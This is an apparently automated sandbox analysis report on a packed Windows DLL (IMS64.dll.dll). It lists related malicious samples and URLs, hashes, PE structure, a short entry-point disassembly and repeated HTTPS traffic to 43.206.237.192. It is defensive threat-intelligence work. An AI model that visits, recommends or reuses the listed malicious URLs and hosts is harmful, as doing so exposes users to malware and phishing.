      • 43.135.99.21
      http://www.samyinyue.com/fr.phpGet hashmaliciousUnknownBrowse
      • 43.139.0.203
      z64wAoCD5w.exeGet hashmaliciousUnknownBrowse
      • 43.198.160.119
      http://battlegrounds-bgmi-reward.events-games.com/Get hashmaliciousUnknownBrowse
      • 43.128.103.195
      sora.m68k.elfGet hashmaliciousUnknownBrowse
      • 40.49.125.62
      sora.mpsl.elfGet hashmaliciousUnknownBrowse
      • 43.187.79.88
      sora.ppc.elfGet hashmaliciousUnknownBrowse
      • 43.61.74.42
      sora.arm7.elfGet hashmaliciousMiraiBrowse
      • 43.136.5.202
      sora.arm.elfGet hashmaliciousUnknownBrowse
      • 43.203.14.244
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      37f463bf4616ecd445d4a1937da06e19Payment_Advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 43.206.237.192
      Apponde2.exeGet hashmaliciousAveMaria, UACMe, XRedBrowse
      • 43.206.237.192
      file.exeGet hashmaliciousMeduza StealerBrowse
      • 43.206.237.192
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 43.206.237.192
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 43.206.237.192
      x64_x32_installer__v4.4.9.msiGet hashmaliciousUnknownBrowse
      • 43.206.237.192
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 43.206.237.192
      Setup.exeGet hashmaliciousVidarBrowse
      • 43.206.237.192
      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 43.206.237.192
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 43.206.237.192
      No context
      No created / dropped files found
      File type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
      Entropy (8bit):7.954168963281946
      TrID:
      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
      • Win64 Executable (generic) (12005/4) 10.17%
      • Generic Win/DOS Executable (2004/3) 1.70%
      • DOS Executable Generic (2002/1) 1.70%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
      File name:IMS64.dll.dll
      File size:270'336 bytes
      MD5:4a10fb513a346ffdca884fa74cf18015
      SHA1:623b8046938fd54fae54957ece8c7ff40653217b
      SHA256:079e3171048286472cff2b0267cd2d6a90bf9d7f45255f48031bf4bf2ac3b0b4
      SHA512:00931f752966cdcab894ca86301d12ac3ce06781e0fe9220054eb475770fda0aa8f58f863fab5225d2b8566fd7afe4aed69a56d2e791b590c0445305c479802f
      SSDEEP:6144:M7tLKV/ZQEhoEo9/+CvLMtvs137aaaDnka/za1C/:M7t8WE+/xvcvs1EDkaz
      TLSH:4E4412097AAAE4BCCE57D4F9056DE531643F31069C1C86B81E82E0373E677D835BA98C
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!..f..........."...)............@.....................................................`... ............................
      Icon Hash:7ae282899bbab082
      Entrypoint:0x205d51340
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x205d50000
      Subsystem:windows cui
      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, DLL
      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
      Time Stamp:0x66CD9421 [Tue Aug 27 08:53:53 2024 UTC]
      TLS Callbacks:0x5d514f0, 0x2, 0x5d514c0, 0x2
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:df00652ad3e78ba777ba702462655cf8
      Instruction
      dec eax
      mov eax, dword ptr [00040F09h]
      mov dword ptr [eax], 00000000h
      jmp 00007F0C98E08BE3h
      nop word ptr [eax+eax+00000000h]
      nop dword ptr [eax]
      dec eax
      mov edx, ecx
      dec eax
      lea ecx, dword ptr [00043C96h]
      jmp 00007F0C98E09C06h
      nop
      dec eax
      lea ecx, dword ptr [00000009h]
      jmp 00007F0C98E08D39h
      nop dword ptr [eax+00h]
      ret
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      jmp 00007F0C98E08D6Eh
      jmp 00007F0C98E08D60h
      jmp 00007F0C98E08D54h
      jmp 00007F0C98E08D74h
      dec ecx
      mov edx, ecx
      dec esp
      mov eax, ecx
      jmp dword ptr [esp+28h]
      dec ecx
      mov edx, ecx
      dec eax
      mov eax, dword ptr [esp+30h]
      jmp dword ptr [esp+38h]
      dec ecx
      mov edx, ecx
      dec eax
      mov eax, dword ptr [esp+38h]
      jmp dword ptr [esp+40h]
      dec ecx
      mov edx, ecx
      dec eax
      mov eax, dword ptr [esp+60h]
      jmp dword ptr [esp+68h]
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      nop
      push ebp
      dec eax
      mov ebp, esp
      dec eax
      sub esp, 20h
      dec eax
      mov eax, dword ptr [00001C21h]
      dec eax
      mov eax, dword ptr [eax]
      dec eax
      test eax, eax
      je 00007F0C98E08D78h
      nop word ptr [eax+eax+00000000h]
      call eax
      dec eax
      mov eax, dword ptr [00001C07h]
      dec eax
      lea edx, dword ptr [eax+08h]
      dec eax
      mov eax, dword ptr [eax+08h]
      dec eax
      mov dword ptr [00001BF8h], edx
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x460000x44.edata
      IMAGE_DIRECTORY_ENTRY_IMPORT0x470000x368.idata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x430000x21c.pdata
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a0000x5c.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x420200x28.rdata
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x471000xc0.idata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x18880x1a00079ade57fd7fd5e198c51331a35526beFalse0.5805288461538461data6.02656266342615IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .data0x30000x3eb100x3ec00454de6321f3862ae7d413163eae1d781False0.9868455864043825data7.996663236311901IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rdata0x420000x2d00x400c21c59646630f5eb61510c7eddaca0baFalse0.3046875SysEx File - PalmTree3.034549702627992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .pdata0x430000x21c0x40066906a84b4648d7bf40a0990306889bdFalse0.30859375data2.538723940112595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .xdata0x440000x1a80x200824eb5e2c7ac801453ef1cb7eb2f6f36False0.396484375data3.773379184135226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .bss0x450000xe00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .edata0x460000x440x200f169a4118c3d97251f615ae507476e4cFalse0.126953125data0.7488638911136207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .idata0x470000x3680x4003e867741b92470d9e2567176d80b2effFalse0.34765625data3.4698558599248295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .CRT0x480000x580x2006ff5386daed93bbd1da1f406c45de42bFalse0.05859375data0.25323120180391656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .tls0x490000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .reloc0x4a0000x5c0x20002d981ee66f68254a25fff07cccdeb7aFalse0.1796875data1.0043269309123346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      DLLImport
      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
      msvcrt.dll__iob_func, _amsg_exit, _initterm, _lock, _unlock, abort, calloc, free, fwrite, realloc, strlen, strncmp, vfprintf
      NameOrdinalAddress
      main10x205d525e0
      TimestampSource PortDest PortSource IPDest IP
      Aug 28, 2024 13:37:57.789480925 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:57.789513111 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:57.789572001 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:57.804466009 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:57.804506063 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:57.804563999 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:57.828502893 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:57.828516006 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:57.838118076 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:57.838135004 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:58.701853037 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:58.701987982 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:58.704580069 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:58.704668045 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:58.778304100 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:58.778316975 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:58.779361010 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:58.779426098 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:58.781238079 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:58.795020103 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:58.795042992 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:58.795346022 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:58.795386076 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:58.797826052 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:58.824496984 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:58.844494104 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.126604080 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.126682043 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.126866102 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.127101898 CEST49731443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.127115011 CEST4434973143.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.142712116 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.142791986 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.142802954 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.142863035 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.142877102 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.142904997 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.143062115 CEST49730443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.143074036 CEST4434973043.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.155944109 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.155966997 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.156063080 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.156255960 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.156269073 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.157063007 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.157078028 CEST4434973343.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.157160997 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.157316923 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.157326937 CEST4434973343.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.940629959 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.940737009 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.960962057 CEST4434973343.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.961091995 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.961817026 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.961824894 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.963102102 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.963108063 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.963488102 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.963496923 CEST4434973343.206.237.192192.168.2.4
      Aug 28, 2024 13:37:59.964533091 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:37:59.964538097 CEST4434973343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.371902943 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.371997118 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.372020960 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.372036934 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.372075081 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.372093916 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.382185936 CEST49732443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.382205009 CEST4434973243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.397471905 CEST4434973343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.397541046 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.397546053 CEST4434973343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.397592068 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.399027109 CEST49733443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.399043083 CEST4434973343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.539830923 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.539885044 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:00.539987087 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.545834064 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:00.545846939 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.466993093 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.467093945 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.540112972 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.540142059 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.540527105 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.540683031 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.542192936 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.588511944 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.920270920 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.920380116 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.920418978 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.920445919 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.920463085 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.920494080 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.920845032 CEST49734443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.920866013 CEST4434973443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.922096968 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.922138929 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:01.922239065 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.922471046 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:01.922487974 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:02.739522934 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:02.739720106 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:02.756964922 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:02.756974936 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:02.797823906 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:02.797846079 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:03.188900948 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:03.188961983 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:03.188977957 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:03.188993931 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:03.189023972 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:03.189045906 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:03.225919008 CEST49735443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:03.225940943 CEST4434973543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:23.301357985 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:23.301399946 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:23.301475048 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:23.301712036 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:23.301728010 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:24.114377022 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:24.114528894 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:24.115145922 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:24.115158081 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:24.124083996 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:24.124092102 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:24.551552057 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:24.551640034 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:24.551654100 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:24.551701069 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:24.551721096 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:24.551764011 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:24.552395105 CEST49742443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:24.552408934 CEST4434974243.206.237.192192.168.2.4
      Aug 28, 2024 13:38:29.709765911 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:29.709791899 CEST4434974343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:29.709852934 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:29.710675001 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:29.710691929 CEST4434974443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:29.710750103 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:29.717107058 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:29.717122078 CEST4434974343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:29.717344046 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:29.717355967 CEST4434974443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:30.722275972 CEST4434974443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:30.722368002 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:30.722882032 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:30.722887039 CEST4434974443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:30.731131077 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:30.731136084 CEST4434974443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:30.744163036 CEST4434974343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:30.744271994 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:30.744647026 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:30.744658947 CEST4434974343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:30.752723932 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:30.752728939 CEST4434974343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:31.158726931 CEST4434974443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:31.158787012 CEST4434974443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:31.158834934 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:31.158885002 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:31.159097910 CEST49744443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:31.159106970 CEST4434974443.206.237.192192.168.2.4
      Aug 28, 2024 13:38:31.192913055 CEST4434974343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:31.193003893 CEST4434974343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:31.193015099 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:31.193054914 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:31.193237066 CEST49743443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:31.193247080 CEST4434974343.206.237.192192.168.2.4
      Aug 28, 2024 13:38:36.575401068 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:36.575409889 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:36.575602055 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:36.575833082 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:36.575845003 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:37.385302067 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:37.385374069 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:37.385886908 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:37.385891914 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:37.387120008 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:37.387131929 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:37.837740898 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:37.837826014 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:37.837835073 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:37.837881088 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:37.837899923 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:37.837980032 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:38.080738068 CEST49745443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:38.080754995 CEST4434974543.206.237.192192.168.2.4
      Aug 28, 2024 13:38:59.295489073 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:59.295526981 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:38:59.295595884 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:59.296138048 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:38:59.296149969 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:39:00.118809938 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:39:00.118900061 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:00.120098114 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:00.120104074 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:39:00.121316910 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:00.121321917 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:39:00.574177980 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:39:00.574244976 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:00.574255943 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:39:00.574270010 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:39:00.574299097 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:00.574314117 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:00.575495958 CEST49747443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:00.575505972 CEST4434974743.206.237.192192.168.2.4
      Aug 28, 2024 13:39:01.185379028 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.185410023 CEST4434974843.206.237.192192.168.2.4
      Aug 28, 2024 13:39:01.185488939 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.185776949 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.185791016 CEST4434974843.206.237.192192.168.2.4
      Aug 28, 2024 13:39:01.247813940 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.247843981 CEST4434974943.206.237.192192.168.2.4
      Aug 28, 2024 13:39:01.247915030 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.248322964 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.248337984 CEST4434974943.206.237.192192.168.2.4
      Aug 28, 2024 13:39:01.979377985 CEST4434974843.206.237.192192.168.2.4
      Aug 28, 2024 13:39:01.979487896 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.980503082 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.980509043 CEST4434974843.206.237.192192.168.2.4
      Aug 28, 2024 13:39:01.984163046 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:01.984169006 CEST4434974843.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.051650047 CEST4434974943.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.051783085 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.052707911 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.052721024 CEST4434974943.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.055639029 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.055644989 CEST4434974943.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.412760973 CEST4434974843.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.412827969 CEST4434974843.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.412832975 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.412873983 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.413021088 CEST49748443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.413029909 CEST4434974843.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.497617006 CEST4434974943.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.497688055 CEST4434974943.206.237.192192.168.2.4
      Aug 28, 2024 13:39:02.497693062 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.497733116 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.497891903 CEST49749443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:02.497905970 CEST4434974943.206.237.192192.168.2.4
      Aug 28, 2024 13:39:15.810075998 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:15.810094118 CEST4434975043.206.237.192192.168.2.4
      Aug 28, 2024 13:39:15.810170889 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:15.810430050 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:15.810440063 CEST4434975043.206.237.192192.168.2.4
      Aug 28, 2024 13:39:16.637413025 CEST4434975043.206.237.192192.168.2.4
